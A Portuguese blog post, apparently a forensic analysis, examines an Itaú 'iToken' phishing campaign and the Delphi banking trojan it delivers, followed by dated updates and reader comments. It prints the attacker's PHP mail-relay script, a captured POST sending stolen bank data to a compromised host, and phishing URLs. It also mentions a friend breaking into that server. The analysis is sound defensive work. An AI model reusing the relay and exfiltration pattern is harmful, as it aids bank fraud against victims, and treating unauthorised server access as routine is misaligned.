iToken é um dispositivo de senhas eletrônicas utilizado pelo Banco Itaú para adicionar mais uma barreira de proteção para seus clientes acessarem contas bancárias pela Internet. Nesse caso os fraudadores utilizam o nome do dispositivo na engenharia social para induzirem as vítimas a instalarem malwares em seus computadores.
Identificação e Coleta das Evidências
No dia 19/10/2010 recebi um spam phishing com os campos “De: Itaú Bankline” e “Assunto: Central de segurança Itaú: iToken v1.3”. No e-mail havia um link que apontava para a URL:
http://dmcbattle.co.za/seguranca/dispositivo.php?InstalarAplicativo=ver1.3
Ao clicar no link foi solicitado o download do arquivo abaixo:
Nome: Aplicativov1.3.exe (Trojan-Banker.Win32.Banker2.abp)
MD5: 124ecdd2bd55b9e2d28542ff3da65ef5
No dia 05/11/2010 recebi um outro phishing com os mesmos campos “De: Itaú Bankline” e “Assunto: Central de segurança Itaú: iToken v1.3”, porém o texto escrito nesse e-mail era diferente (apesar de ser sobre o mesmo tema) e o link apontava para outra URL:
http://acoffeeinthepark.com/logs/dispositivo.php?InstalarAplicativo=itokenv13-257823732654
Ao clicar no link foi solicitado o download de um arquivo com o mesmo nome, mas com MD5 diferente:
Nome: Aplicativov1.3.exe (Trojan-Banker.Win32.Banker2.aer)
MD5: a36d31cac126e6ff56eb786e57c689af
Análise das Evidências
Para descobrir mais informações sobre os arquivos coletados, submeti o primeiro “Aplicativov1.3.exe” ao programa Exeinfo PE para identificar um possível packer no executável.
Nada foi encontrado, porém o programa também não conseguiu identificar a linguagem de programação utilizada. O mesmo aconteceu com o PEiD e RDG.
Prosseguindo submeti o arquivo ao OllyDbg. Na busca por strings relevantes também não identifiquei nenhuma pista sobre a função do arquivo até encontrar essa linha:
“Software\WinRAR SFX”
O módulo SFX (SelF-eXtrating) do WinRAR permite descomprimir arquivos automaticamente sem a necessidade de outros programas, o próprio executável carrega o módulo de descompressão.
Resolvi executar o arquivo para confirmar se seria descompactado algum outro executável. Ao fazer isso foi criado um novo arquivo:
Nome: iToken.exe (Trojan-Banker.Win32.Banker2.abp)
MD5: 51e5d6f6f0ff2bc0ae3792d98d12fdbe
O arquivo “iToken.exe” foi criado e executado automaticamente. Antes de analisar o funcionamento dele eu queria realizar a engenharia reversa, então matei o processo e o submeti ao Exeinfo PE.
Nenhum packer foi encontrado e a linguagem de programação foi identificada: Borland Delphi.
A análise de executáveis codificados em Delphi na maioria das vezes fica mais fácil através do descompilador DeDe do que o Assembly no OllyDbg. Então utilizei o DeDe para descompilar o “iToken.exe” e gerar um projeto para abrir depois no próprio Delphi.
O DeDe conseguiu identificar três Forms e Units no executável.
Ao abrir o projeto gerado pelo DeDe no Delphi e visualizar os três Forms, encontrei as telas utilizadas pelo malware:
Tela 1
Tela 2
Tela 3
Conforme pode-se ver, as três telas são cópias das páginas verdadeiras do site do Banco Itaú. Nelas são solicitadas várias informações bancárias que tentam persuadir as vítimas digitarem seus dados sigilosos.
Na Tela 3 do malware há um botão (que na verdade é uma imagem) denominado “CONFIRMAR”. No projeto do Delphi nesse botão há um evento “ImageClick” codificado, ou seja, quando ele é clicado executa alguma função.
A função nesse caso é bastante peculiar, enviar para o e-mail do fraudador todas as informações que a vítima digitou. Diferente do que ocorre na maioria das vezes, dessa vez o e-mail está em texto simples, sem criptografia.
No código logo abaixo do endereço de e-mail, há algo que me chamou atenção, uma URL.
http://www.oberoning.lv/plugins/system/fckgwrhqq2.php
A princípio não entendi a função dela no malware, mas resolvi investigar, queria saber o que havia no código-fonte desse arquivo “fckgwrhqq2.php”.
Para conseguir isso teria que descobrir qual vulnerabilidade o fraudador explorou para invadir o site www.oberoning.lv (Letônia). Meu amigo Bernardo descobriu isso pra mim e tive acesso ao servidor.
Fiz download do arquivo “fckgwrhqq2.php” e o código-fonte dele era esse:
<?php
$email = $_POST['email'] ;
$from = $_POST['from'];
$subject = $_POST['subject'];
$message = $_POST['message'] ;
mail( $email, $subject, $message, "From: $from" );
?>
Então na verdade não era o malware que enviava o e-mail, ele apenas passava os dados pela URL para essa página PHP que recebia e enviava a mensagem. Ele deve ter feito dessa forma para simplificar o código-fonte do malware.
Para confirmar todas essas informações e não deixar nenhuma dúvida, deixei rodando um sniffer de rede (Wireshark) e executei o malware inserindo dados falsos.
Os pacotes capturados geraram esse tráfego de rede:
POST /plugins/system/fckgwrhqq2.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
Host: www.oberoning.lv
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
email=aXXXXXX%40gmail%2Ecom&from=iniciando%40exe%2Ecom&subject=VIRTUAL%5FXP&message=1111%0D11111%0D1%0D000000%0D01+01+01+01+01+01+%0D03+03+03+03+03+03+&
Lembrando que no começo do artigo escrevi que havia dois arquivos “Aplicativov1.3.exe” com MD5 diferentes, ao executar o segundo gerou também um “iToken.exe” com MD5 diferente.
Nome: iToken.exe (Trojan-Banker.Win32.Banker2.aer)
MD5: 9615a83c0cfca4793bbfb5206f3afa06
Esse segundo “iToken.exe” possuía exatamente as mesmas funções do primeiro analisado mas o endereço de e-mail e URL para onde ele enviava as informações furtadas era outra.
Conclusão
Nessa perícia foi possível constatar a materialidade da fraude, a dinâmica e apontar um caminho para identificar a autoria através dos endereços de e-mails encontrados. Todas as informações foram encaminhadas para a polícia civil.
Verificou-se a existência de dois malwares com funções idênticas mas com endereços de e-mails e spam distintos. Isso pode significar que o fraudador utiliza dados diferentes para aplicar o mesmo golpe ou ainda que esse malware foi vendido ou trocado por várias pessoas que apenas personalizam com seus e-mails.
O que costuma ocorrer bastante nesse tipo de crime, um programador cria o malware e vende para os fraudadores que não possuem muitos conhecimentos em computação e apenas adaptam de acordo com suas necessidades.
[POST adicionado em 15/11/2010]
Conforme eu havia solicitado, o leitor Almir me enviou um spam que recebeu também referente a essa fraude do iToken Itaú. Nesse phishing, na engenharia social utilizaram a marca Itaú Personnalité para tentar enganar as vítimas.
Ao clicar no link do email foi solicitado o download do arquivo "iTokenv1.2.exe", esse arquivo seguia o mesmo padrão dos outros, ao executá-lo foi descompactado o arquivo "update.exe".
Aos descompilar o "update.exe" foram identificadas as mesmas telas da fraude, porém dessa vez as cores utilizadas no malware seguem o padrão do Itaú Personnalité. Novamente foi identificado um endereço de email para onde são enviados os dados furtados.
Agradeço a todos que colaboram com o Blog deixando comentários, enviando e-mails e divulgando. Caso ainda receba esse mesmo tipo de e-mail peço que me envie.
[POST adicionado em 23/12/2010]
A fraude do iToken Itaú ainda esta ativa, dessa vez foi o leitor Clenilson que me encaminhou o e-mail do golpe para análise. Esse ao clicar no link faz download do arquivo:
dispositivo.exe (MD5: 9d3b0096646d3ba27e5e5ed265e50912)
Após ser executado gera o arquivo:
dr.exe (MD5: 7caff8bdd3135362e0f36dea618a287d)
Apresenta uma janela para a vítima digitar os dados bancários e depois envia por e-mail para o fraudador conforme imagem abaixo:
[POST adicionado em 06/01/2011]
Mais um phishing iToken Itaú, esse foi o Tiago que me enviou. Dois endereços de e-mails identificados nessa fraude, um já era conhecido e o outro é novo.
Arquivos encontrados:
iTOKEN.exe (MD5: e842be20dd1ee72f929a6d6cac9e16a3)
dr.exe (MD5: 2690e33abb889791280950730048bc04)
Ronaldo Lima
crimesciberneticos.com | twitter.com/crimescibernet
Leia também:
Muito bom seu artigo demonstrando como fazer a análise de um malware e indicando as medidas que devem ser tomadas.
ResponderExcluirÉ isso aí! =p
Obrigado. boa explicação...
ResponderExcluirSemanalmente recebemos essas porcarias... é um absurdo isso.
ResponderExcluirParabéns! Pela primeira vez eu pude ver alguém explicar com tanta clareza algo que as vezes é muito complexo. Obrigado e ótimo artigo. Esses fraudadores se deram mal mandando isso pra você. kkkkkkk
ResponderExcluirSempre recebo essas coisas por e-mail, mas NUNCA abri, nem cliquei em nada, pois ja sei muito bem que é fraude. Porém, não sei como esse programa se instalou em minha maquina de uso pessoal. Abriu uma página idêntica do Itaú e eu achando que era uma página real e forneci todos meus dados. Conclusão, rasparam minha conta toda. Neguinho não está pra brincadeira, nem eu !!!!!
ResponderExcluirEste comentário foi removido por um administrador do blog.
ResponderExcluir"Todas as informações foram encaminhadas para a polícia civil."
ResponderExcluirE a polícia civil tem feito algo a este respeito? Frente a gama de golpes virtuais, temos visto pouquíssima ação por parte das autoridades policiais, tanto civis, quanto federais.
Tive que remover o comentário acima pois tinha palavrão.
ResponderExcluirAnônimo,
Você chegou a ler o post da entrevista com o delegado da PF? Mostra bem o trabalho que a PF está fazendo para tentar combater esse tipo de crime, o link é esse:
http://www.crimesciberneticos.com/2011/01/noticia-fraudes-bancarias-pela-internet.html
Essa operação tentáculos é muito boa, diminuiu muito o número de phishings da Caixa Econômica Federal, tanto é que não tem nenhuma análise da Caixa no Blog.
Já os banco privados é competência da Polícia Civil. Esse tipo de crime fica mais difícil para a PC investigar já que envolve vários estados, geralmente são realizadas prisões isoladas.
De modo geral as polícias ainda estão no começo para conseguir coibir esses crimes, ainda falta pessoal qualificado, equipamentos, estruturas, etc. Apesar disso creio que nos próximos anos isso irá mudar.
Essa é minha opinião.
Abraços!
podem me add linkscr1@hotmail.com
ResponderExcluirAnônimo você falou que rasparam a sua conta. Como eles fizeram para tirar o dinheiro da sua conta?
ResponderExcluirPeter
Olá. Tenho um computador rodando o OpenSUSE 11.3 no trabalho de minha esposa e ela o utiliza entre outras coisas para trabalhos bancários por crer que é mais seguro. Qual não foi nossa surpresa hoje (10/02/2012) a nos deparar com uma situação grave: Ela tentava acessar o site do itaú e não conseguia (Firefox e Chrome), me disse também que recebeu uma mensagem (segundo ela ao tentar acessar a página do itaú) pedindo para informar o itoken, senha etc. E depois recebeu um teefonema do banco dizendo que haviam bloqueado uma transferência de R$23.000,00 e da conta da empresa pq o pc parecia estar contaminado por "vírus". Será que isso é possível? Lembrando que o OpenSUSE está atualizado e ela trabalha como usuário normal (senha de root fica comigo).
ResponderExcluirOlá Lauro, acho muito mais provável que ela tenha entrado em uma página falsa do banco (phishing) do que instalado um malware no linux ainda mais por não ser root e haver poucos malwares para essa plataforma.
ResponderExcluirContra páginas falsas nem o linux resolve. Seria interesse vocês tentarem refazer os passos que ela fez, onde clicou, que URL acessou, qual mensagem recebeu, etc, para descobrirem mais sobre o caso.
Abraços!
Olá, sempre quando cai dinheiro em minha conta aparece lá determinado valor, com isso o banco automaticamente já desconta os valores do pacote, do mês e os que estavam pendentes, porém no dia seguinte quando vou na agência da minha cidade sacar aparece outro valor menor do que tinha antes. Um exemplo disso: fizeram um depósito de R$1000 para minha conta, logicamente o banco descontou os pacotes e restaram 967,95 no outro dia quando fui sacar, só tinha R$900. O que aconteceu?
ResponderExcluir